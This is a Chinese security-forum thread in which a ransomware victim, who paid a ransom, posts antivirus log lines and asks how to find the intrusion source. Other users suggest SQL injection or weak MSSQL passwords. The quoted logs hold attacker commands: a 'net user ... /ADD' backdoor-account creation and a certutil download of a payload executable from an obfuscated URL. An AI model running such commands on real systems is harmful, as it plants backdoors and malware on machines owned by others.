首页
社区
课程
招聘
[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案
发表于: 2024-10-21 15:25 4200

[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案

2024-10-21 15:25
4200

后缀 bixi 解密
被勒索!! 了几万块!

缴纳赎金后 重新装系统了。
现在观察,杀毒软件的日志如下附件

如何找到源头
操作目标:【执行】 C:\Windows\System32\net.exe
操作目标参数:net user k8h3d k8d3j9SjfS7 /ADD


[注意]看雪招聘,专注安全领域的专业人才平台!

最后于 2024-10-21 15:52 被反勒索学习11编辑 ,原因:
上传的附件:
收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 71
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
2
反勒索每个技术员的正向爱好
2024-10-21 19:11
0
雪    币: 82
活跃值: (679)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
twe
3
感觉是sql 注入漏洞进来的
2024-10-22 15:51
0
雪    币: 2446
活跃值: (3259)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
这不是驱动人生那个勒索的账号密码么
2024-10-22 16:16
0
雪    币: 1131
活跃值: (1314)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
5
mssql 弱口令,自己检查下密码
2024-10-22 16:27
0
雪    币: 1606
活跃值: (2086)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
建议关机
2024-10-23 09:39
0
雪    币: 71
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
7

2024.10.1 1点中毒,勒索信--见--本楼回复的。附件,发邮件给黑客,说3000美元一个ID,


防护项目:数据库

操作目标:【执行】 C:\Windows\System32\certutil.exe

操作目标参数:certutil  -urlcache -split -f bfdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2K9r3q4I4L8#2)9J5k6h3&6W2N6q4)9J5c8X3c8D9L8q4)9J5k6h3g2^5k6g2)9K6c8X3k6J5i4K6y4p5L8i4y4K6M7h3H3`. c:\setupinstalled.exe

操作结果:已阻止

这一条,  这个网站c86K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2K9r3q4I4L8#2)9J5k6h3&6W2N6q4)9J5c8X3c8D9L8q4)9J5k6h3g2^5k6b7`.`.  杀毒软件 提示是盗号木马, 

最后于 2024-10-23 14:41 被反勒索学习11编辑 ,原因:
上传的附件:
2024-10-23 14:29
0
雪    币: 82
活跃值: (679)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
twe
8
漏洞修补就行了,给你私信了。
2024-10-23 15:53
0
游客
登录 | 注册 方可回帖
返回